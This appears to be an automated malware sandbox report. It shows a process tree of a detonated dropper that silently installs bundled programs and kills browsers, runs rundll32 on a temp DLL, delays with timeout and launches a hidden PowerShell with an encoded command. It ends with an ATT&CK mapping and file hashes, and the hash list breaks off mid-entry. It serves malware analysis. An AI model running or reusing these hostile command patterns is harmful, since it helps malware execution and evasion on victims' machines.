"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3160 /prefetch:8
7⤵
PID:6800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
7⤵
PID:7332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
7⤵
PID:7372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5432 /prefetch:8
7⤵
PID:8580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
7⤵
PID:8608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
7⤵
PID:8644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
7⤵
PID:9800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1
7⤵
PID:9928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6292 /prefetch:8
7⤵
PID:10124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6276 /prefetch:8
7⤵
PID:10164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
7⤵
PID:10344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
7⤵
PID:10916

C:\Users\Admin\AppData\Local\Temp\0a-dc648-eb4-728ab-87a3c71033465\Dovulolyzhe.exe
"C:\Users\Admin\AppData\Local\Temp\0a-dc648-eb4-728ab-87a3c71033465\Dovulolyzhe.exe"
5⤵
PID:38376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ifuo2fn.sy2\installer.exe /qn CAMPAIGN= & exit
6⤵
PID:5180

C:\Users\Admin\AppData\Local\Temp\4ifuo2fn.sy2\installer.exe
C:\Users\Admin\AppData\Local\Temp\4ifuo2fn.sy2\installer.exe /qn CAMPAIGN=
7⤵
PID:5984

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN="" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4ifuo2fn.sy2\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4ifuo2fn.sy2\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1655309883 /qn CAMPAIGN= " CAMPAIGN=""
8⤵
PID:9700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4a4n0xjj.3qs\161.exe /silent /subid=798 & exit
6⤵
PID:5928

C:\Users\Admin\AppData\Local\Temp\4a4n0xjj.3qs\161.exe
C:\Users\Admin\AppData\Local\Temp\4a4n0xjj.3qs\161.exe /silent /subid=798
7⤵
PID:6684

C:\Users\Admin\AppData\Local\Temp\is-AC35F.tmp\161.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AC35F.tmp\161.tmp" /SL5="$801B0,15170975,270336,C:\Users\Admin\AppData\Local\Temp\4a4n0xjj.3qs\161.exe" /silent /subid=798
8⤵
PID:6908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
9⤵
PID:9260

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
10⤵
PID:9676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
9⤵
PID:10944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wgw44nhf.hk1\gcleaner.exe /mixfive & exit
6⤵
PID:6224

C:\Users\Admin\AppData\Local\Temp\wgw44nhf.hk1\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\wgw44nhf.hk1\gcleaner.exe /mixfive
7⤵
PID:6676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 468
8⤵
- Program crash
PID:7284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 768
8⤵
- Program crash
PID:8220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 776
8⤵
- Program crash
PID:9068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 820
8⤵
- Program crash
PID:9456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 828
8⤵
- Program crash
PID:9724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 984
8⤵
- Program crash
PID:11064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 1016
8⤵
- Program crash
PID:11132

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k4zdylm3.2h1\random.exe & exit
6⤵
PID:6668

C:\Users\Admin\AppData\Local\Temp\k4zdylm3.2h1\random.exe
C:\Users\Admin\AppData\Local\Temp\k4zdylm3.2h1\random.exe
7⤵
PID:7644

C:\Users\Admin\AppData\Local\Temp\k4zdylm3.2h1\random.exe
"C:\Users\Admin\AppData\Local\Temp\k4zdylm3.2h1\random.exe" help
8⤵
PID:7852

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c4hbgtbo.otc\handselfdiy_0.exe & exit
6⤵
PID:7220

C:\Users\Admin\AppData\Local\Temp\c4hbgtbo.otc\handselfdiy_0.exe
C:\Users\Admin\AppData\Local\Temp\c4hbgtbo.otc\handselfdiy_0.exe
7⤵
PID:7740

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
8⤵
PID:7120

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
9⤵
- Kills process with taskkill
PID:9480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
8⤵
PID:10040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x108,0x10c,0x110,0xd8,0xdc,0x7ffa51b54f50,0x7ffa51b54f60,0x7ffa51b54f70
9⤵
PID:10116

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 10116 -s 624
10⤵
- Program crash
PID:11040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1664,8135178534019248032,8718014275738855324,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1816 /prefetch:8
9⤵
PID:10556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1664,8135178534019248032,8718014275738855324,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1732 /prefetch:2
9⤵
PID:10548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1664,8135178534019248032,8718014275738855324,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2352 /prefetch:8
9⤵
PID:10612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,8135178534019248032,8718014275738855324,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:1
9⤵
PID:10800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,8135178534019248032,8718014275738855324,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2884 /prefetch:1
9⤵
PID:10784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ov5ljeka.q1v\wDzAUYj.exe & exit
6⤵
PID:7484

C:\Users\Admin\AppData\Local\Temp\ov5ljeka.q1v\wDzAUYj.exe
C:\Users\Admin\AppData\Local\Temp\ov5ljeka.q1v\wDzAUYj.exe
7⤵
PID:7756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gaqouz4d.s5t\rmaa1045.exe & exit
6⤵
PID:8660

C:\Users\Admin\AppData\Local\Temp\gaqouz4d.s5t\rmaa1045.exe
C:\Users\Admin\AppData\Local\Temp\gaqouz4d.s5t\rmaa1045.exe
7⤵
PID:9196

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 9196 -s 700
8⤵
- Program crash
PID:9576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fbqkyivu.fdw\installer.exe /qn CAMPAIGN=654 & exit
6⤵
PID:9304

C:\Users\Admin\AppData\Local\Temp\fbqkyivu.fdw\installer.exe
C:\Users\Admin\AppData\Local\Temp\fbqkyivu.fdw\installer.exe /qn CAMPAIGN=654
7⤵
PID:9492

C:\Program Files\Windows Sidebar\QUETSGQLNY\irecord.exe
"C:\Program Files\Windows Sidebar\QUETSGQLNY\irecord.exe" /VERYSILENT
5⤵
PID:4740

C:\Users\Admin\AppData\Local\Temp\is-JH3SS.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JH3SS.tmp\irecord.tmp" /SL5="$30208,5808768,66560,C:\Program Files\Windows Sidebar\QUETSGQLNY\irecord.exe" /VERYSILENT
6⤵
PID:4132

C:\Program Files (x86)\i-record\I-Record.exe
"C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
7⤵
PID:5340

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~1.EXE
1⤵
PID:11960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Sleep -Seconds 8;Start-Sleep -Seconds 10;
2⤵
PID:13672

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 45
2⤵
PID:8424

C:\Windows\SysWOW64\timeout.exe
timeout 45
3⤵
- Delays execution with timeout.exe
PID:8936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3276 -ip 3276
1⤵
PID:11984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3276 -ip 3276
1⤵
PID:28260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3276 -ip 3276
1⤵
PID:28064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3276 -ip 3276
1⤵
PID:38176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3276 -ip 3276
1⤵
PID:38664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 38364 -ip 38364
1⤵
PID:38856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3276 -ip 3276
1⤵
PID:3872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 38364 -ip 38364
1⤵
PID:38324

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 188 -p 38412 -ip 38412
1⤵
PID:2916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3276 -ip 3276
1⤵
PID:1068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 808 -ip 808
1⤵
PID:3364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 38364 -ip 38364
1⤵
PID:3384

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:1388

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:4580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 600
3⤵
- Program crash
PID:4440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 38364 -ip 38364
1⤵
PID:3232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4580 -ip 4580
1⤵
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4368 -ip 4368
1⤵
PID:1716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3276 -ip 3276
1⤵
PID:4968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffa55e846f8,0x7ffa55e84708,0x7ffa55e84718
1⤵
PID:5476

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5476 -s 768
2⤵
- Program crash
PID:11048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3276 -ip 3276
1⤵
PID:5544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 38364 -ip 38364
1⤵
PID:5392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 38364 -ip 38364
1⤵
PID:5904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 38364 -ip 38364
1⤵
PID:6420

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6676 -ip 6676
1⤵
PID:7196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 38364 -ip 38364
1⤵
PID:7604

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:7880

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding CB63C956ADA2B57101FC56154F7CD2E3 C
2⤵
PID:8896

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 859E8B43C4356CCBB6179058311F04BA
2⤵
PID:10288

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
3⤵
- Kills process with taskkill
PID:10768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6676 -ip 6676
1⤵
PID:8124

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:8388

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:8440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8440 -s 600
3⤵
- Program crash
PID:8824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 38364 -ip 38364
1⤵
PID:8528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 8440 -ip 8440
1⤵
PID:8560

C:\Users\Admin\AppData\Local\Temp\6B96.exe
C:\Users\Admin\AppData\Local\Temp\6B96.exe
1⤵
PID:9008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Sleep -Seconds 10;Start-Sleep -Seconds 10;
2⤵
PID:9076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 6676 -ip 6676
1⤵
PID:9044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6676 -ip 6676
1⤵
PID:9436

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 656 -p 9196 -ip 9196
1⤵
PID:9508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6676 -ip 6676
1⤵
PID:9684

C:\Users\Admin\AppData\Local\Temp\820D.exe
C:\Users\Admin\AppData\Local\Temp\820D.exe
1⤵
PID:9756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9756 -s 1256
2⤵
- Program crash
PID:11224

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 10116 -ip 10116
1⤵
PID:10860

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 624 -p 5476 -ip 5476
1⤵
PID:10880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6676 -ip 6676
1⤵
PID:11008

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:11032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6676 -ip 6676
1⤵
PID:11104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 9756 -ip 9756
1⤵
PID:11212

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Scripting

T1064

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize
727B

MD5
caff41558a9421585fa0258541273201

SHA1
ea4d399583f5e2439fa90ac7120aa9386e39913b

SHA256
8b7e4659200ec2fae99c90e9e108baa3add971729dd34c8cf3eb9a966ff6adbe

SHA512
c4faeed1b967e5988b298e875618e2c870c10d84a4ef3b1aeafa754c70dbfaab4496069911229bf4e501b940ef9c2df8c415b83647694e6ce075b76a0fd3cd06

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
Filesize
1KB

MD5
7189878979610495600652304c41abf7

SHA1
1e252c7271a6d1ceedc0b3a7b5587495e061e094

SHA256
112763c8a5171c4153741110d96d52c9af14ba86af505d059a37830bc8ceb827

SHA512
05b5efac2745d6ccec6151e96b3d92b6d2ffd57db11d5652ef934b8a6275f05a38ce8ea89035f25e73427a344ad1046b4a7127eca82d096a90b93fd08e1b11d7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\572BF21E454637C9F000BE1AF9B1E1A9
Filesize
506B

MD5
a856f68d5f890571edc355d38043a8a5

SHA1
1343b0dc58c13de95ec15dd345f04850c3ee3c88

SHA256
21f89f450409d5684558c2daffa635e0dc309b2f1a0110c5799306eabb09412e

SHA512
8ac2553834dd710b6b9258997efdcbe6deb798b1465da8976aed08fe07790daf6ba78c5eb59bb1cc2808ae0ad84b3a4cdd09cc10c3cf80df1290efdd9417b6ae

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
1KB

MD5
4a215c9c4090822cc661b144a1ff662d

SHA1
3f337ac20e862a68e318b791bd03505bb3b70757

SHA256
6d71b3114d84f7e1521d75dee039b4d56314645727bdc01a02b00fcd5f2025bb

SHA512
335a75a50c3ee94beda5e72cda7d5533609edd0f426ce5637f8da22326aebc8a9480981bb34c2e1c2e05339bedc6560a09cfed745a2b75a4b9c8c16ffb1ef2fb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\738FBC066DBD9E6001113366624890A3_53C5D34017BDB72400155AC2819BA60D
Filesize
1KB

MD5
0a328836201623269f1b513998527dc5

SHA1
ecdafdfe15fa77f930ff4c78b3cbefff0eabb6e9

SHA256
f35757cff62a872a4ea71f55bbd010bb6fd086d8afe1185441a8ee9b176ccd95

SHA512
760c5f4fc1d0b8f35ff03b9044bade72b4c85c4ced3955e850c2b4c6161f8f6ab7779d34051d94a7949b8e5bcf0676a1c7a414aa6fe0294c51277d19c682b453

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D
Filesize
1KB

MD5
da758f4642937f2f3e298c7a18a1bca2

SHA1
56c01b057d0daf2b99a8ad9068015962a8d933be

SHA256
8c81ba8e967f98b2c54b010a6a82211e7c0ee8134496ec3d2a73303faa7ef70b

SHA512
1cd04888c9b8403197936f55b82e8f3e64bd706d0b80bc663c164ba9847d2bbb0cf61cda0a1a4fe082f0b90c0b25616e2f25f01c4e781af4260bd720a335aa59

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize
402B

MD5
c78cfe2d8558f5b037cd9fe5172b191f

SHA1
234ce1664bec2f24b550b5c34394f5bdc79050ff

SHA256
de3204d74eee6a77beed13d38dce70540d3850314c33fd4b28c10b19f0a7f190

SHA512
5cdcce7244ac46adb6f719b78b655b6899bf425a2dc45a10d40cf56f7c1f5d8b9c02b1f5deaa1c01a7acb52d5f467adc8fdb4be251fa7c0a917694f066b667b8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
Filesize
450B

MD5
8a6f13468b8a91df1fca420407170464

SHA1
31efa75c582f499e32d5aa5a9593edc068a57c11

SHA256
b74053b886e43f399b02fe775e1eb83a2014d7d1cc8246c36ce24405f1aaed70

SHA512
86998d1ed868743716ebc1acd31f3f9f4cc064ae2839891fa56ca1684ddaca06685f8bf2c53e3c86cf691a87b31f012ce7d2315abdfa41f56db40cf5c401a2ad

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
Filesize
450B

MD5
8a6f13468b8a91df1fca420407170464

SHA1
31efa75c582f499e32d5aa5a9593edc068a57c11

SHA256
